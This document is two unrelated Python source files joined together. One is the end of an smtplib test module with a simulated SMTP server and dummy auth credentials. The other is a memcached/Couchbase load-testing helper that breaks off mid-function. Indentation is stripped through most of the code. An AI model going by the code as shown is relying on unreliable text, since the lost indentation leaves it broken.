self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {0}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accept(self):
conn, addr = self.accept()
self._SMTPchannel = SimSMTPChannel(self._extra_features,
self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, '%s %s' % (name, smtplib.quoteaddr(email)))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, 'No such user: %s' % u)
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, '\n'.join(users))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, 'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
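    # A quick sketch (illustrative) of how the constants above can be reproduced;
    # the uppercasing mirrors how the unrecognised command is echoed back:
    #   >>> import base64
    #   >>> base64.b64encode('somepassword')
    #   'c29tZXBhc3N3b3Jk'            # .upper() == sim_auth_login_password
    #   >>> base64.b64encode('Mr.A@somewhere.com')
    #   'TXIuQUBzb21ld2hlcmUuY29t'    # == sim_auth_credentials['login']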
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_login_password not in str(err):
                self.fail("expected encoded password not found in error message")
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_credentials['cram-md5'] not in str(err):
                self.fail("expected encoded credentials not found in error message")
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
def test_main(verbose=None):
test_support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests)
if __name__ == '__main__':
test_main()
|
data_helper.py
|
import copy
import socket
from multiprocessing.process import Process
from multiprocessing.queues import Queue
import random
import time
from random import Random
import uuid
from TestInput import TestInputServer
from TestInput import TestInputSingleton
import lib.logger as logger
import lib.crc32 as crc32
import hashlib
import threading
from lib.mc_bin_client import MemcachedClient, MemcachedError
from lib.mc_ascii_client import MemcachedAsciiClient
from lib.memcached.helper.old_kvstore import ClientKeyValueStore
from lib.membase.api.rest_client import RestConnection, RestHelper, Bucket
from lib.memcacheConstants import ERR_NOT_FOUND, ERR_NOT_MY_VBUCKET, ERR_ETMPFAIL, ERR_EINVAL
import json
import sys
from lib.perf_engines import mcsoda
class MemcachedClientHelperExcetion(Exception):
def __init__(self, errorcode, message):
Exception.__init__(self, errorcode, message)
self._message = message
self.errorcode = errorcode
self._args = (errorcode, message)
class MemcachedClientHelper(object):
    #value_sizes {10: 0.1, 20: 0.2, 40: 0.8}
@staticmethod
def create_threads(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0):
log = logger.Logger.get_logger()
if not servers:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="servers is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
if ram_load_ratio >= 0:
info = RestConnection(servers[0]).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
how_many = int(space_to_fill / (size + 250) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
                how_many = number_of_items * probability
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
for item in list:
item['how_many'] /= int(number_of_threads)
#at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
            #choose one of the servers at random
thread = WorkerThread(serverInfo=MemcachedClientHelper.random_pick(servers),
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
async_write=async_write,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
threads.append(thread)
return threads
@staticmethod
def create_threads_for_load_bucket(serverInfo=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0):
log = logger.Logger.get_logger()
if not serverInfo:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="serverInfo is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.33, 128: 0.33, 1024: 0.33}
list = []
if ram_load_ratio >= 0:
info = RestConnection(serverInfo).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
                #assume roughly 250 bytes of overhead per item (hence size + 250 below)
how_many = int(space_to_fill / (size + 250) * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = (number_of_items * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
for item in list:
item['how_many'] /= int(number_of_threads)
#at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
thread = WorkerThread(serverInfo=serverInfo,
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
threads.append(thread)
return threads
@staticmethod
def load_bucket_and_return_the_keys(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0):
inserted_keys = []
rejected_keys = []
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
#we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
inserted_count = 0
rejected_count = 0
deleted_count = 0
expired_count = 0
for thread in threads:
t_inserted, t_rejected = thread.keys_set()
inserted_count += thread.inserted_keys_count()
rejected_count += thread.rejected_keys_count()
deleted_count += thread._delete_count
expired_count += thread._expiry_count
inserted_keys.extend(t_inserted)
rejected_keys.extend(t_rejected)
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_count, rejected_count))
msg = "deleted keys count : {0} , expired keys count : {1}"
log.info(msg.format(deleted_count, expired_count))
return inserted_keys, rejected_keys
@staticmethod
def load_bucket(servers,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True):
inserted_keys_count = 0
rejected_keys_count = 0
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only,
moxi)
#we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
for thread in threads:
inserted_keys_count += thread.inserted_keys_count()
rejected_keys_count += thread.rejected_keys_count()
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_keys_count, rejected_keys_count))
return inserted_keys_count, rejected_keys_count
@staticmethod
def create_value(pattern, size):
return (pattern * (size / len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def random_pick(list):
if list:
if len(list) > 1:
return list[Random().randint(0, len(list) - 1)]
return list[0]
#raise array empty ?
return None
@staticmethod
def direct_client(server, bucket, timeout=30):
        log = logger.Logger.get_logger()
rest = RestConnection(server)
node = None
try:
node = rest.get_nodes_self()
except ValueError as e:
log.info("could not connect to server {0}, will try scanning all nodes".format(server))
if not node:
nodes = rest.get_nodes()
for n in nodes:
if n.ip == server.ip and n.port == server.port:
node = n
if isinstance(server, dict):
log.info("dict:{0}".format(server))
log.info("creating direct client {0}:{1} {2}".format(server["ip"], node.memcached, bucket))
else:
log.info("creating direct client {0}:{1} {2}".format(server.ip, node.memcached, bucket))
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = RestConnection(server).get_vbuckets(bucket)
if isinstance(server, dict):
client = MemcachedClient(server["ip"], node.memcached, timeout=timeout)
else:
client = MemcachedClient(server.ip, node.memcached, timeout=timeout)
client.vbucket_count = len(vBuckets)
bucket_info = rest.get_bucket(bucket)
#todo raise exception for not bucket_info
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
return client
@staticmethod
def proxy_client(server, bucket, timeout=30, force_ascii=False):
#for this bucket on this node what is the proxy ?
rest = RestConnection(server)
log = logger.Logger.get_logger()
bucket_info = rest.get_bucket(bucket)
nodes = bucket_info.nodes
if (TestInputSingleton.input and "ascii" in TestInputSingleton.input.test_params\
and TestInputSingleton.input.test_params["ascii"].lower() == "true")\
or force_ascii:
ascii = True
else:
ascii = False
for node in nodes:
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = rest.get_vbuckets(bucket)
if ascii:
log = logger.Logger.get_logger()
log.info("creating ascii client {0}:{1} {2}".format(server.ip, bucket_info.port, bucket))
client = MemcachedAsciiClient(server.ip, bucket_info.port, timeout=timeout)
else:
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], node.moxi, bucket))
client = MemcachedClient(server["ip"], node.moxi, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, node.moxi, bucket))
client = MemcachedClient(server.ip, node.moxi, timeout=timeout)
client.vbucket_count = len(vBuckets)
if bucket_info.authType == "sasl":
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def flush_bucket(server, bucket):
#if memcached throws OOM error try again ?
log = logger.Logger.get_logger()
client = MemcachedClientHelper.direct_client(server, bucket)
retry_attempt = 5
while retry_attempt > 0:
try:
client.flush()
log.info('flushed bucket {0}...'.format(bucket))
break
except MemcachedError:
retry_attempt -= 1
log = logger.Logger.get_logger()
log.info('flush raised memcached error trying again in 5 seconds...')
time.sleep(5)
client.close()
return
class MutationThread(threading.Thread):
def run(self):
values = DocumentGenerator.make_docs(len(self.keys),
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": 1024, "seed": self.seed})
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = 0
for value in values:
try:
if self.op == "set":
client.set(self.keys[counter], 0, 0, value)
self._mutated_count += 1
except MemcachedError:
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
except Exception as e:
self.log.info("unable to mutate {0} due to {1}".format(self.keys[counter], e))
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
client.close()
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = counter + 1
self.log.info("mutation failed {0} times".format(self._rejected_count))
client.close()
def __init__(self, serverInfo,
keys,
op,
seed,
name='default'):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.keys = keys
self.op = op
self.seed = seed
self._mutated_count = 0
self._rejected_count = 0
self._rejected_keys = []
class ReaderThread(object):
def __init__(self, info, keyset, queue):
self.info = info
self.log = logger.Logger.get_logger()
self.error_seen = 0
self.keyset = keyset
self.aborted = False
self.queue = queue
def abort(self):
self.aborted = True
def _saw_error(self, key):
# error_msg = "unable to get key {0}"
self.error_seen += 1
# if self.error_seen < 500:
# self.log.error(error_msg.format(key))
def start(self):
client = MemcachedClientHelper.direct_client(self.info["server"], self.info['name'])
time.sleep(5)
while self.queue.empty() and self.keyset:
selected = MemcachedClientHelper.random_pick(self.keyset)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.keyset.remove(selected)
key = "{0}-{1}-{2}".format(self.info['baseuuid'],
selected['size'],
int(selected['how_many']))
try:
client.send_get(key)
except Exception:
self._saw_error(key)
# self.log.warn("attempted to get {0} keys before they are set".format(self.error_seen))
client.close()
    #mutation? let's do two cycles: first run, and then try to mutate all those items
    #and return
class WorkerThread(threading.Thread):
    #two flags: stop after x errors
    #slow down after every y errors seen
#value_list is a list of document generators
def __init__(self,
serverInfo,
name,
values_list,
ignore_how_many_errors=5000,
override_vBucketId=-1,
terminate_in_minutes=120,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.values_list = []
self.values_list.extend(copy.deepcopy(values_list))
self._value_list_copy = []
self._value_list_copy.extend(copy.deepcopy(values_list))
self._inserted_keys_count = 0
self._rejected_keys = []
self._rejected_keys_count = 0
self._delete_ratio = delete_ratio
self._expiry_ratio = expiry_ratio
self._delete_count = 0
self._expiry_count = 0
self._delete = []
self.ignore_how_many_errors = ignore_how_many_errors
self.override_vBucketId = override_vBucketId
self.terminate_in_minutes = terminate_in_minutes
self._base_uuid = uuid.uuid4()
self.queue = Queue()
self.moxi = moxi
#let's create a read_thread
self.info = {'server': serverInfo,
'name': self.name,
'baseuuid': self._base_uuid}
self.write_only = write_only
self.aborted = False
self.async_write = async_write
def inserted_keys_count(self):
return self._inserted_keys_count
def rejected_keys_count(self):
return self._rejected_keys_count
    #smart function that gives you something you can use to
    #get the inserted keys
    #we should just expose an iterator instead which
    #generates the key/values on the fly
def keys_set(self):
#let's construct the inserted keys set
#TODO: hard limit , let's only populated up to 1 million keys
inserted_keys = []
for item in self._value_list_copy:
for i in range(0, (int(item['how_many']))):
key = "{0}-{1}-{2}".format(self._base_uuid, item['size'], i)
if key not in self._rejected_keys:
inserted_keys.append(key)
if len(inserted_keys) > 2 * 1024 * 1024:
break
return inserted_keys, self._rejected_keys
def run(self):
msg = "starting a thread to set keys mixed set-get ? {0} and using async_set ? {1}"
msg += " with moxi ? {2}"
msg = msg.format(self.write_only, self.async_write, self.moxi)
self.log.info(msg)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
client = None
if self.moxi:
try:
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
except Exception as ex:
self.log.info("unable to create memcached client due to {0}. stop thread...".format(ex))
import traceback
traceback.print_exc()
return
        #keeping all the keys in memory is not such a good idea because
        #we would run out of memory, so it's best to just keep a counter
        #if someone asks for the keys we can give them the formula, which is
        #"{baseuuid}-{size}-{counter}" with the counter running between n and 0,
        #except for those keys which were rejected
        #let's print out some status every two minutes..
if not self.write_only:
self.reader = Process(target=start_reader_process, args=(self.info, self._value_list_copy, self.queue))
self.reader.start()
start_time = time.time()
last_reported = start_time
backoff_count = 0
while len(self.values_list) > 0 and not self.aborted:
selected = MemcachedClientHelper.random_pick(self.values_list)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.values_list.remove(selected)
if (time.time() - start_time) > self.terminate_in_minutes * 60:
self.log.info("its been more than {0} minutes loading data. stopping the process..".format(
self.terminate_in_minutes))
break
else:
#every two minutes print the status
if time.time() - last_reported > 2 * 60:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
#vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
last_reported = time.time()
for item in self.values_list:
self.log.info(
'{0} keys (each {1} bytes) more to send...'.format(item['how_many'], item['size']))
key = "{0}-{1}-{2}".format(self._base_uuid,
selected['size'],
int(selected['how_many']))
if not self.moxi:
client = awareness.memcached(key)
if not client:
self.log.error("client should not be null")
value = "*"
try:
value = selected["value"].next()
except StopIteration:
pass
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(key, 0, 0, value)
else:
client.set(key, 0, 0, value)
self._inserted_keys_count += 1
backoff_count = 0
# do expiry sets, 30 second expiry time
if Random().random() < self._expiry_ratio:
client.set(key + "-exp", 30, 0, value)
self._expiry_count += 1
# do deletes if we have 100 pending
# at the end delete the remaining
if len(self._delete) >= 100:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del)
self._delete = []
# do delete sets
if Random().random() < self._delete_ratio:
client.set(key + "-del", 0, 0, value)
self._delete.append(key + "-del")
self._delete_count += 1
except MemcachedError as error:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
#vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo["ip"]))
else:
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo.ip))
if error.status == 134:
backoff_count += 1
if backoff_count < 5:
backoff_seconds = 15 * backoff_count
else:
backoff_seconds = 2 * backoff_count
self.log.info("received error # 134. backing off for {0} sec".format(backoff_seconds))
time.sleep(backoff_seconds)
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
except Exception as ex:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error("error {0} from {1}".format(ex, self.serverInfo["ip"]))
import traceback
traceback.print_exc()
else:
self.log.error("error {0} from {1}".format(ex, self.serverInfo.ip))
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
#before closing the session let's try sending those items again
retry = 3
while retry > 0 and self._rejected_keys_count > 0:
rejected_after_retry = []
self._rejected_keys_count = 0
for item in self._rejected_keys:
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(item["key"], 0, 0, item["value"])
else:
client.set(item["key"], 0, 0, item["value"])
self._inserted_keys_count += 1
except MemcachedError:
self._rejected_keys_count += 1
rejected_after_retry.append({"key": item["key"], "value": item["value"]})
if len(rejected_after_retry) > self.ignore_how_many_errors:
break
self._rejected_keys = rejected_after_retry
            retry -= 1
# clean up the rest of the deleted keys
if len(self._delete) > 0:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del)
self._delete = []
self.log.info("deleted {0} keys".format(self._delete_count))
self.log.info("expiry {0} keys".format(self._expiry_count))
# client.close()
awareness.done()
if not self.write_only:
self.queue.put_nowait("stop")
self.reader.join()
def _initialize_memcached(self):
pass
def _set(self):
pass
def _handle_error(self):
pass
#if error is memcached error oom related let's do a sleep
def _time_to_stop(self):
return self.aborted or len(self._rejected_keys) > self.ignore_how_many_errors
class VBucketAwareMemcached(object):
def __init__(self, rest, bucket, info=None):
self.log = logger.Logger.get_logger()
self.info = info
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.memcacheds = {}
self.vBucketMap = {}
self.vBucketMapReplica = {}
self.rest = rest
self.reset(rest)
def reset(self, rest=None):
m, v, r = self.request_map(rest or RestConnection(self.info), self.bucket)
self.memcacheds = m
self.vBucketMap = v
self.vBucketMapReplica = r
def reset_vbucket(self, rest, key):
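        # vbucket id = CRC32 of the key masked by (number of vbuckets - 1);
        # this assumes the vbucket count is a power of two.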
vBucketId = crc32.crc32_hash(key) & (len(self.vBucketMap) - 1)
forward_map = rest.get_bucket(self.bucket).forward_map
if not forward_map:
forward_map = rest.get_vbuckets(self.bucket)
nodes = rest.get_nodes()
for vBucket in forward_map:
if vBucketId == vBucket.id:
self.vBucketMap[vBucket.id] = vBucket.master
masterIp = vBucket.master.split(":")[0]
masterPort = int(vBucket.master.split(":")[1])
if self.vBucketMap[vBucketId] not in self.memcacheds:
server = TestInputServer()
server.rest_username = rest.username
server.rest_password = rest.password
for node in nodes:
if node.ip == masterIp and node.memcached == masterPort:
server.port = node.port
server.ip = masterIp
                        self.log.info("Received forward map, reset vbucket map, new direct_client")
self.memcacheds[vBucket.master] = MemcachedClientHelper.direct_client(server, self.bucket)
# if no one is using that memcached connection anymore just close the connection
used_nodes = set([self.vBucketMap[vb_name] for vb_name in self.vBucketMap])
rm_clients = []
for memcache_con in self.memcacheds:
if memcache_con not in used_nodes:
rm_clients.append(memcache_con)
for rm_cl in rm_clients:
self.memcacheds[rm_cl].close()
del self.memcacheds[rm_cl]
return True
def request_map(self, rest, bucket):
memcacheds = {}
vBucketMap = {}
vBucketMapReplica = {}
vb_ready = RestHelper(rest).vbucket_map_ready(bucket, 60)
if not vb_ready:
raise Exception("vbucket map is not ready for bucket {0}".format(bucket))
vBuckets = rest.get_vbuckets(bucket)
for vBucket in vBuckets:
vBucketMap[vBucket.id] = vBucket.master
self.add_memcached(vBucket.master, memcacheds, rest, bucket)
vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, memcacheds, rest, bucket)
return memcacheds, vBucketMap, vBucketMapReplica
def add_memcached(self, server_str, memcacheds, rest, bucket):
if not server_str in memcacheds:
serverIp = server_str.split(":")[0]
serverPort = int(server_str.split(":")[1])
nodes = rest.get_nodes()
server = TestInputServer()
server.ip = serverIp
server.port = rest.port
server.rest_username = rest.username
server.rest_password = rest.password
try:
for node in nodes:
if node.ip == serverIp and node.memcached == serverPort:
if server_str not in memcacheds:
server.port = node.port
memcacheds[server_str] =\
MemcachedClientHelper.direct_client(server, bucket)
break
except Exception as ex:
            msg = "unable to establish connection to {0}. cleaning up open connections"
self.log.warn(msg.format(serverIp))
self.done()
raise ex
def memcached(self, key, replica_index=None):
vBucketId = crc32.crc32_hash(key) & (len(self.vBucketMap) - 1)
if replica_index is None:
return self.memcached_for_vbucket(vBucketId)
else:
return self.memcached_for_replica_vbucket(vBucketId, replica_index)
def memcached_for_vbucket(self, vBucketId):
if vBucketId not in self.vBucketMap:
msg = "vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMap[vBucketId] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMap[vBucketId]))
return self.memcacheds[self.vBucketMap[vBucketId]]
def memcached_for_replica_vbucket(self, vBucketId, replica_index=0):
if vBucketId not in self.vBucketMapReplica:
msg = "replica vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMapReplica[vBucketId][replica_index] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMapReplica[vBucketId][replica_index]))
return self.memcacheds[self.vBucketMapReplica[vBucketId][replica_index]]
def not_my_vbucket_memcached(self, key):
vBucketId = crc32.crc32_hash(key) & (len(self.vBucketMap) - 1)
which_mc = self.vBucketMap[vBucketId]
for server in self.memcacheds:
if server != which_mc:
return self.memcacheds[server]
def set(self, key, exp, flags, value):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).set, key, exp, flags, value)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except EOFError as error:
                if ("Got empty data (remote died?)" in error.message or
                    "Timeout waiting for socket send." in error.message) and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
def get(self, key):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except EOFError as error:
                if ("Got empty data (remote died?)" in error.message or
                    "Timeout waiting for socket send." in error.message) and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
def delete(self, key):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).delete, key)
except MemcachedError as error:
if error.status in [ERR_NOT_MY_VBUCKET, ERR_EINVAL] and vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except EOFError as error:
                if ("Got empty data (remote died?)" in error.message or
                    "Timeout waiting for socket send." in error.message) and vb_error < 3:
